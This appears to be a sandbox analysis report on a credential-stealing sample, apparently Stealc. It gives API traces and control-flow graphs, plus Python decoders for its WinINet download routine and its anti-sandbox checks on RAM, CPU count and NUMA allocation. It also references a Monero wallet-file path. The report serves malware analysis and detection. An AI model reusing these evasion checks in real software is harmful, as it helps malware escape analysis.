                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 65e4050e43ba6362e3baa4f600be03644e3b488edc70a561d41b533522fff7ef
                  • Instruction ID: bf9448f6e33ece6a5851869305780d8e3c5534b4b2308597ed977b9574daa45d
                  • Opcode Fuzzy Hash: 65e4050e43ba6362e3baa4f600be03644e3b488edc70a561d41b533522fff7ef
                  • Instruction Fuzzy Hash: 85713B71A40218EBEB25DFA0CC49BEE77B8FF44701F508198F50A6B190DBB56A85CF52
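The numeric arguments in the API list for the routine at 0x136280 are raw DWORDs; the WinINet constants behind them are what tell an analyst that this is a plain-HTTP GET with the security flags overridden before the request is sent. The following decoder is an added example for this report, not Joe Sandbox output and not code from the sample. TRACE is a constructed copy of the lines above, the constant names come from wininet.h, and matches_download_pattern() is an illustrative heuristic written for this example, not a Joe Sandbox signature.

```python
"""Decode the WinINet argument constants in the API trace of the routine at
0x136280 (InternetOpenA ... InternetReadFile).

Added example for this report; it is neither Joe Sandbox output nor Stealc code.
TRACE is a constructed copy of the API list above, constant names come from
wininet.h, and matches_download_pattern() is an illustrative heuristic of the
author of this example, not a Joe Sandbox signature.
"""
import re
from dataclasses import dataclass

TRACE = """\
• InternetOpenA.WININET(00150DFE,00000001,00000000,00000000,00000000), ref: 001362E1
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00136335
• HttpOpenRequestA.WININET(00000000,GET,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00136385
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001363BF
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001363D1
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001363FD
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0013646D
"""

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]+)$")

# wininet.h values for the arguments that appear in the trace
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPTION = {31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {19: "HTTP_QUERY_STATUS_CODE"}
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


@dataclass
class Call:
    api: str
    module: str
    args: list   # int for hex words, str for resolved strings, None for "?"
    ref: int     # address of the call instruction


def parse_arg(tok: str):
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok   # a string the sandbox resolved, e.g. GET


def parse_trace(text: str) -> list:
    """Accepts the report's lines as-is, including the leading bullet."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip().lstrip("•").strip())
        if m:
            calls.append(Call(m["api"], m["mod"], [parse_arg(a) for a in m["args"].split(",")], int(m["ref"], 16)))
    return calls


def decode_flags(value: int) -> list:
    names = [n for bit, n in INTERNET_FLAGS.items() if value & bit]
    known = sum(INTERNET_FLAGS)           # bits are distinct, so sum == OR
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        names.append(f"unknown:{leftover:#010x}")
    return sorted(names)


def summarize(calls: list) -> dict:
    """Name the constants; argument positions follow the wininet.h prototypes."""
    s = {}
    for c in calls:
        if c.api == "InternetOpenA":
            s["access_type"] = INTERNET_OPEN_TYPE.get(c.args[1], hex(c.args[1]))
        elif c.api == "InternetConnectA":
            s["port"] = c.args[2]                         # "?" in the trace -> None
            s["service"] = INTERNET_SERVICE.get(c.args[5], hex(c.args[5]))
        elif c.api == "HttpOpenRequestA":
            s["verb"] = c.args[1]
            s["request_flags"] = decode_flags(c.args[6])
        elif c.api == "InternetSetOptionA":
            s["option"] = INTERNET_OPTION.get(c.args[1], str(c.args[1]))
            s["option_len"] = c.args[3]                   # 4 = one DWORD of flags
        elif c.api == "HttpQueryInfoA":
            s["query"] = HTTP_QUERY.get(c.args[1], str(c.args[1]))
        elif c.api == "InternetReadFile":
            s["chunk_size"] = c.args[2]                   # bytes requested per read
    return s


def matches_download_pattern(s: dict) -> bool:
    """Illustrative rule: plain-HTTP GET whose security flags are overridden
    before sending, status code checked, body read in fixed-size chunks."""
    return (s.get("service") == "INTERNET_SERVICE_HTTP"
            and s.get("verb") == "GET"
            and "INTERNET_FLAG_SECURE" not in s.get("request_flags", [])
            and s.get("option") == "INTERNET_OPTION_SECURITY_FLAGS"
            and s.get("query") == "HTTP_QUERY_STATUS_CODE"
            and isinstance(s.get("chunk_size"), int))
```

Two points the decoded values make that the raw trace does not: 0x00400100 on HttpOpenRequestA is INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE with no INTERNET_FLAG_SECURE, so the request goes over plain HTTP, and the DWORD written by InternetSetOptionA(INTERNET_OPTION_SECURITY_FLAGS) is shown as "?" in the trace, so whether certificate errors are ignored cannot be concluded from this page. The 0x7CF (1999-byte) read size is an odd constant that is worth keeping as a correlation feature alongside the API sequence.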

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 145510-145577 call 145ad0 call 14a820 * 3 call 14a740 * 4 1106 14557c-145583 1090->1106 1107 145585-1455b6 call 14a820 call 14a7a0 call 131590 call 1451f0 1106->1107 1108 1455d7-14564c call 14a740 * 2 call 131590 call 1452c0 call 14a8a0 call 14a800 call 14aad0 StrCmpCA 1106->1108 1123 1455bb-1455d2 call 14a8a0 call 14a800 1107->1123 1134 145693-1456a9 call 14aad0 StrCmpCA 1108->1134 1138 14564e-14568e call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1108->1138 1123->1134 1139 1457dc-145844 call 14a8a0 call 14a820 * 2 call 131670 call 14a800 * 4 call 146560 call 131550 1134->1139 1140 1456af-1456b6 1134->1140 1138->1134 1271 145ac3-145ac6 1139->1271 1142 1456bc-1456c3 1140->1142 1143 1457da-14585f call 14aad0 StrCmpCA 1140->1143 1146 1456c5-145719 call 14a820 call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1142->1146 1147 14571e-145793 call 14a740 * 2 call 131590 call 1452c0 call 14a8a0 call 14a800 call 14aad0 StrCmpCA 1142->1147 1161 145865-14586c 1143->1161 1162 145991-1459f9 call 14a8a0 call 14a820 * 2 call 131670 call 14a800 * 4 call 146560 call 131550 1143->1162 1146->1143 1147->1143 1250 145795-1457d5 call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1147->1250 1168 145872-145879 1161->1168 1169 14598f-145a14 call 14aad0 StrCmpCA 1161->1169 1162->1271 1175 1458d3-145948 call 14a740 * 2 call 131590 call 1452c0 call 14a8a0 call 14a800 call 14aad0 StrCmpCA 1168->1175 1176 14587b-1458ce call 14a820 call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1168->1176 1198 145a16-145a21 Sleep 1169->1198 1199 145a28-145a91 call 14a8a0 call 14a820 * 2 call 131670 call 14a800 * 4 call 146560 call 131550 1169->1199 1175->1169 1274 14594a-14598a call 14a7a0 call 131590 call 1451f0 call 14a8a0 call 14a800 1175->1274 1176->1169 1198->1106 1199->1271 1250->1143 1274->1169
                  APIs
                    • Part of subcall function 0014A820: lstrlen.KERNEL32(00134F05,?,?,00134F05,00150DDE), ref: 0014A82B
                    • Part of subcall function 0014A820: lstrcpy.KERNEL32(00150DDE,00000000), ref: 0014A885
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00145644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001456A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00145857
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00145228
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 001452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00145318
                    • Part of subcall function 001452C0: lstrlen.KERNEL32(00000000), ref: 0014532F
                    • Part of subcall function 001452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00145364
                    • Part of subcall function 001452C0: lstrlen.KERNEL32(00000000), ref: 00145383
                    • Part of subcall function 001452C0: lstrlen.KERNEL32(00000000), ref: 001453AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0014578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00145940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00145A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00145A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: b6d8f0f54bbe9b5ab54115c86c6842c62ea4507774153439c237367a6395d230
                  • Instruction ID: 4e5331f6379c0b87019dd79af96d37a955b75db4bcaa72383634c83899cf45e1
                  • Opcode Fuzzy Hash: b6d8f0f54bbe9b5ab54115c86c6842c62ea4507774153439c237367a6395d230
                  • Instruction Fuzzy Hash: 1FE16172950504ABDB15FBB0DC52EED737DAFA4301F918128B406670B2EF346A4DCB92

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 1417a0-1417cd call 14aad0 StrCmpCA 1304 1417d7-1417f1 call 14aad0 1301->1304 1305 1417cf-1417d1 ExitProcess 1301->1305 1309 1417f4-1417f8 1304->1309 1310 1419c2-1419cd call 14a800 1309->1310 1311 1417fe-141811 1309->1311 1313 141817-14181a 1311->1313 1314 14199e-1419bd 1311->1314 1316 141835-141844 call 14a820 1313->1316 1317 141970-141981 StrCmpCA 1313->1317 1318 1418f1-141902 StrCmpCA 1313->1318 1319 141951-141962 StrCmpCA 1313->1319 1320 141932-141943 StrCmpCA 1313->1320 1321 141913-141924 StrCmpCA 1313->1321 1322 14185d-14186e StrCmpCA 1313->1322 1323 14187f-141890 StrCmpCA 1313->1323 1324 141821-141830 call 14a820 1313->1324 1325 1418ad-1418be StrCmpCA 1313->1325 1326 1418cf-1418e0 StrCmpCA 1313->1326 1327 14198f-141999 call 14a820 1313->1327 1328 141849-141858 call 14a820 1313->1328 1314->1309 1316->1314 1349 141983-141986 1317->1349 1350 14198d 1317->1350 1340 141904-141907 1318->1340 1341 14190e 1318->1341 1346 141964-141967 1319->1346 1347 14196e 1319->1347 1344 141945-141948 1320->1344 1345 14194f 1320->1345 1342 141926-141929 1321->1342 1343 141930 1321->1343 1332 141870-141873 1322->1332 1333 14187a 1322->1333 1334 141892-14189c 1323->1334 1335 14189e-1418a1 1323->1335 1324->1314 1336 1418c0-1418c3 1325->1336 1337 1418ca 1325->1337 1338 1418e2-1418e5 1326->1338 1339 1418ec 1326->1339 1327->1314 1328->1314 1332->1333 1333->1314 1354 1418a8 1334->1354 1335->1354 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1354->1314
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 001417C5
                  • ExitProcess.KERNEL32 ref: 001417D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 01c444bed3f9e3bd6bd0d477a3fb3ad9e998a2942cbafbc8673e32ec711b3ca8
                  • Instruction ID: a5b1125386dd98f4040d46965dbe367940a25d0131b86b702b510ff8815efaad
                  • Opcode Fuzzy Hash: 01c444bed3f9e3bd6bd0d477a3fb3ad9e998a2942cbafbc8673e32ec711b3ca8
                  • Instruction Fuzzy Hash: 73515AB5A1420AFFDB05DFE0D954ABE77B5BF44309F104048E816AB360D770A985CB62

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 147500-14754a GetWindowsDirectoryA 1357 147553-1475c7 GetVolumeInformationA call 148d00 * 3 1356->1357 1358 14754c 1356->1358 1365 1475d8-1475df 1357->1365 1358->1357 1366 1475e1-1475fa call 148d00 1365->1366 1367 1475fc-147617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 147628-147658 wsprintfA call 14a740 1367->1369 1370 147619-147626 call 14a740 1367->1370 1377 14767e-14768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00147542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0014757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0014760A
                  • wsprintfA.USER32 ref: 00147640
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 3345dee9a37a005a09312ce41762f284446d9d23b956a54e9095e2ec36581230
                  • Instruction ID: cd9f7b3ec661968bc594b0e54a5a017d50f35acfcd9a74d4fa6744aa2df7dba8
                  • Opcode Fuzzy Hash: 3345dee9a37a005a09312ce41762f284446d9d23b956a54e9095e2ec36581230
                  • Instruction Fuzzy Hash: A941B4B1D04248ABDF21DF94DC45BEEBBB8EF58704F100198F5096B2D0D7746A84CBA5

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010206C0), ref: 001498A1
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010205A0), ref: 001498BA
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010205B8), ref: 001498D2
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020780), ref: 001498EA
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020678), ref: 00149903
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01028AA0), ref: 0014991B
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01016700), ref: 00149933
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010167A0), ref: 0014994C
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020618), ref: 00149964
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020810), ref: 0014997C
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020720), ref: 00149995
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,010207B0), ref: 001499AD
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01016A00), ref: 001499C5
                    • Part of subcall function 00149860: GetProcAddress.KERNEL32(75900000,01020648), ref: 001499DE
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 001311D0: ExitProcess.KERNEL32 ref: 00131211
                    • Part of subcall function 00131160: GetSystemInfo.KERNEL32(?), ref: 0013116A
                    • Part of subcall function 00131160: ExitProcess.KERNEL32 ref: 0013117E
                    • Part of subcall function 00131110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0013112B
                    • Part of subcall function 00131110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00131132
                    • Part of subcall function 00131110: ExitProcess.KERNEL32 ref: 00131143
                    • Part of subcall function 00131220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0013123E
                    • Part of subcall function 00131220: __aulldiv.LIBCMT ref: 00131258
                    • Part of subcall function 00131220: __aulldiv.LIBCMT ref: 00131266
                    • Part of subcall function 00131220: ExitProcess.KERNEL32 ref: 00131294
                    • Part of subcall function 00146770: GetUserDefaultLangID.KERNEL32 ref: 00146774
                    • Part of subcall function 00131190: ExitProcess.KERNEL32 ref: 001311C6
                    • Part of subcall function 00147850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001311B7), ref: 00147880
                    • Part of subcall function 00147850: RtlAllocateHeap.NTDLL(00000000), ref: 00147887
                    • Part of subcall function 00147850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0014789F
                    • Part of subcall function 001478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147910
                    • Part of subcall function 001478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00147917
                    • Part of subcall function 001478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0014792F
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01028AB0,?,0015110C,?,00000000,?,00151110,?,00000000,00150AEF), ref: 00146ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00146AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00146AF9
                  • Sleep.KERNEL32(00001770), ref: 00146B04
                  • CloseHandle.KERNEL32(?,00000000,?,01028AB0,?,0015110C,?,00000000,?,00151110,?,00000000,00150AEF), ref: 00146B1A
                  • ExitProcess.KERNEL32 ref: 00146B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 924970beb3fde328ef0db43d024ae1dec70ffa17e82845f4add861ac5e47e394
                  • Instruction ID: eedf169c9e37c08a77f2f884a2923f6c86615b9429353c7d9d380d18d4582322
                  • Opcode Fuzzy Hash: 924970beb3fde328ef0db43d024ae1dec70ffa17e82845f4add861ac5e47e394
                  • Instruction Fuzzy Hash: C7317F70980209ABEB05FBF0DC56BEE7738EF64305F914518F212A61A2DF706945C7A2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1436 131220-131247 call 1489b0 GlobalMemoryStatusEx 1439 131273-13127a 1436->1439 1440 131249-131271 call 14da00 * 2 1436->1440 1442 131281-131285 1439->1442 1440->1442 1444 131287 1442->1444 1445 13129a-13129d 1442->1445 1447 131292-131294 ExitProcess 1444->1447 1448 131289-131290 1444->1448 1448->1445 1448->1447
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0013123E
                  • __aulldiv.LIBCMT ref: 00131258
                  • __aulldiv.LIBCMT ref: 00131266
                  • ExitProcess.KERNEL32 ref: 00131294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: d5f28bee20ec76a8bf81e8c3114c8b4be6aeebb9e078244bd5e4758441143261
                  • Instruction ID: 159da9e26f6b097d5f34ff5b3c8fa7bc0dde5e4ec7bada6d48e903b5f9c6cc2e
                  • Opcode Fuzzy Hash: d5f28bee20ec76a8bf81e8c3114c8b4be6aeebb9e078244bd5e4758441143261
                  • Instruction Fuzzy Hash: 5F01FBB0944308BAEF10EBE4DC49BAEBB78AB54705F308048E705B6290D77455458799
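The routine above (GlobalMemoryStatusEx, two __aulldiv calls, ExitProcess) and its siblings in the subcall list of the routine at 0x146aba (GetSystemInfo then ExitProcess at 0x131160, VirtualAllocExNuma then ExitProcess at 0x131110) are environment checks: each reads one host property and terminates the process when the value looks like a sandbox. The decoder below is an added example for this report, not Joe Sandbox output and not code from the sample. It parses the two structures the checks fill, using the 32-bit layouts (the sample maps at 0x00130000 and is a 32-bit image; MEMORYSTATUSEX.dwLength = 0x40 is the 00000040 argument in the trace), and names the VirtualAllocExNuma arguments. Two things are assumptions and not facts from the report: that the __aulldiv pair divides by 1024 twice (bytes to MB), and the CPU and RAM thresholds, which are illustrative parameters only.

```python
"""Recover the inputs of the environment checks at 0x131160 (GetSystemInfo),
0x131220 (GlobalMemoryStatusEx + two __aulldiv) and 0x131110 (VirtualAllocExNuma)
from raw structure bytes and trace arguments.

Added example for this report; it is neither Joe Sandbox output nor Stealc code.
Layouts follow the Win32 headers for a 32-bit process. Assumptions, not facts
from the report: the two __aulldiv calls divide by 1024 (bytes -> MB), and the
min_cpus / min_ram_mb thresholds are illustrative parameters only.
"""
import struct

# 32-bit SYSTEM_INFO (36 bytes): wProcessorArchitecture, wReserved, dwPageSize,
# lpMinimumApplicationAddress, lpMaximumApplicationAddress, dwActiveProcessorMask,
# dwNumberOfProcessors, dwProcessorType, dwAllocationGranularity, wProcessorLevel,
# wProcessorRevision
SYSTEM_INFO32 = struct.Struct("<HHIIIIIIIHH")

# MEMORYSTATUSEX (64 bytes = 0x40, the value passed in the trace): dwLength,
# dwMemoryLoad, ullTotalPhys, ullAvailPhys, ullTotalPageFile, ullAvailPageFile,
# ullTotalVirtual, ullAvailVirtual, ullAvailExtendedVirtual
MEMORYSTATUSEX = struct.Struct("<II7Q")

MEM_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}


def processor_count(system_info: bytes) -> int:
    """dwNumberOfProcessors, the field the check at 0x131160 can read."""
    return SYSTEM_INFO32.unpack_from(system_info)[6]


def total_phys_mb(memstatus: bytes) -> int:
    """ullTotalPhys reduced by two unsigned 64-bit divisions, mirroring the
    __aulldiv pair at 0x131258 / 0x131266 (divisor 1024 is an assumption)."""
    fields = MEMORYSTATUSEX.unpack_from(memstatus)
    if fields[0] != MEMORYSTATUSEX.size:
        raise ValueError("dwLength must be 0x40 for MEMORYSTATUSEX")
    return (fields[2] // 1024) // 1024


def decode_numa_alloc(size: int, alloc_type: int, protect: int) -> dict:
    """Name the VirtualAllocExNuma arguments seen in the trace (0x7D0, 0x3000, 0x40)."""
    return {
        "size": size,
        "type": sorted(n for bit, n in MEM_TYPE.items() if alloc_type & bit),
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
    }


def evaluate_checks(system_info: bytes, memstatus: bytes, numa_alloc_ok: bool,
                    min_cpus: int = 2, min_ram_mb: int = 2048) -> dict:
    """Which of the three checks would reach ExitProcess on a host with these
    values. min_cpus / min_ram_mb are illustrative thresholds, not the sample's;
    the NUMA check only needs the allocation to succeed."""
    return {
        "cpu_count": processor_count(system_info) < min_cpus,
        "ram": total_phys_mb(memstatus) < min_ram_mb,
        "numa_alloc": not numa_alloc_ok,
    }


def build_system_info(cpus: int) -> bytes:
    """Constructed SYSTEM_INFO for testing: x86, 4 KiB pages, 64 KiB granularity."""
    return SYSTEM_INFO32.pack(0, 0, 0x1000, 0x10000, 0x7FFEFFFF, (1 << cpus) - 1,
                              cpus, 586, 0x10000, 6, 0)


def build_memstatus(total_phys: int) -> bytes:
    """Constructed MEMORYSTATUSEX for testing; only ullTotalPhys matters here."""
    return MEMORYSTATUSEX.pack(0x40, 50, total_phys, total_phys // 2,
                               total_phys * 2, total_phys, 0x7FFE0000, 0x70000000, 0)
```

The functions take the structure bytes as they sit in a memory dump, so processor_count() and total_phys_mb() can be pointed at the buffers GetSystemInfo and GlobalMemoryStatusEx filled in the .sdmp files listed for this analysis. The VirtualAllocExNuma arguments decode to a 2000-byte MEM_COMMIT | MEM_RESERVE allocation with PAGE_EXECUTE_READWRITE on NUMA node 0; a request this small that is followed by ExitProcess on failure is a capability probe of the environment rather than a buffer the sample goes on to use.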

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1450 146af3 1451 146b0a 1450->1451 1453 146b0c-146b22 call 146920 call 145b10 CloseHandle ExitProcess 1451->1453 1454 146aba-146ad7 call 14aad0 OpenEventA 1451->1454 1459 146af5-146b04 CloseHandle Sleep 1454->1459 1460 146ad9-146af1 call 14aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01028AB0,?,0015110C,?,00000000,?,00151110,?,00000000,00150AEF), ref: 00146ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00146AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00146AF9
                  • Sleep.KERNEL32(00001770), ref: 00146B04
                  • CloseHandle.KERNEL32(?,00000000,?,01028AB0,?,0015110C,?,00000000,?,00151110,?,00000000,00150AEF), ref: 00146B1A
                  • ExitProcess.KERNEL32 ref: 00146B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: d588cc3e9e485dc862491a13995f6588da28fb7e9bbddd1bd662a8ad79a448bf
                  • Instruction ID: bf335989fe887f10200414d70a9279c06997341754fcfa97e6455813d38d11e4
                  • Opcode Fuzzy Hash: d588cc3e9e485dc862491a13995f6588da28fb7e9bbddd1bd662a8ad79a448bf
                  • Instruction Fuzzy Hash: BAF0E2B0A40609EFE715ABA0DC0ABBD7B38FF14705F204814F517E20E1CBB01581D697

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: c137ece1bae5970c6dfc8217cac1f0fae5de05da13df6ffcdc551f06fafe1cdb
                  • Instruction ID: e60f9d4e42df4dd3f6e8b485103808c377d9756f663ebe5c7b64d6a8da86f754
                  • Opcode Fuzzy Hash: c137ece1bae5970c6dfc8217cac1f0fae5de05da13df6ffcdc551f06fafe1cdb
                  • Instruction Fuzzy Hash: 3C213EB1D00209ABDF14DFA5EC45ADE7B79FF44320F108625F915A7291EB706A0ACB91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 00136280: InternetOpenA.WININET(00150DFE,00000001,00000000,00000000,00000000), ref: 001362E1
                    • Part of subcall function 00136280: StrCmpCA.SHLWAPI(?,0102E470), ref: 00136303
                    • Part of subcall function 00136280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00136335
                    • Part of subcall function 00136280: HttpOpenRequestA.WININET(00000000,GET,?,0102DA58,00000000,00000000,00400100,00000000), ref: 00136385
                    • Part of subcall function 00136280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001363BF
                    • Part of subcall function 00136280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001363D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00145228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 3666c2d8fac42e2b510474dd4c4c716acbefc58c373ea49276d2a9f9075c0bdf
